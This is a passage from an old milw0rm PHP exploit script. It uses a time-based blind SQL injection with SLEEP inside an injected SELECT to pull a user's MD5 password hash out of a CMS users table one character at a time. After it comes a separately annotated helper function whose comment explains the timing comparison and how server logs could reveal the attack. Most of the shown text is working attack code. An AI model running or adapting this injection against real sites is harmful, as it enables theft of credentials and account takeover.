die("\n[-] Login failed!\n"); } } $user = getusername($uid); print "\n[-] Username: {$user}"; $hash = array(0, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 97, 98, 99, 100, 101, 102); $index = 1; $md5 = ""; print "\n[-] MD5 Hash: "; while (!strpos($md5, chr(0))) { for ($i = 0, $n = count($hash); $i <= $n; $i++) { if ($i == $n) { die("\n\n[-] Exploit failed...\n"); } $sql = "'OR(SELECT IF(ORD(SUBSTR(user_password,{$index},1))={$hash[$i]},SLEEP({$count}),1) FROM {$prefix}_users WHERE user_id={$uid})#"; if (getdelay($sql) >= $count * 1000) { $md5 .= chr($hash[$i]); print chr($hash[$i]); break; } } $index++; } if (!eregi("[0-9,a-f]{32}", $md5)) { print "\n\n[-] Invalid MD5 hash...\n"; } else { print "\n\n[-] Successfull!\n"; } ?> # milw0rm.com [2008-05-19]
/**
 * Decide whether the request built from $query took noticeably longer than the baseline.
 *
 * The elapsed time is obtained from getdelay() (defined outside this block) and
 * truncated to an integer; the baseline is the global $ndelay. Units are whatever
 * getdelay() reports - NOTE(review): confirm both values use the same unit.
 *
 * Review note: a "slower than twice the baseline" comparison is the decision step
 * of response-time inference. Server-side, that traffic appears as repeated
 * near-identical requests whose latency sits well above the normal baseline,
 * which is what query-time logging and rate limiting should surface.
 *
 * @param mixed $query Passed unchanged to getdelay().
 * @return bool True only when the integer delay is strictly greater than $ndelay * 2.
 */
function check_query($query)
{
    global $ndelay;

    // Truncate to an integer before comparing, as the original did with intval().
    $elapsed = (int) getdelay($query);

    return $elapsed > $ndelay * 2;
}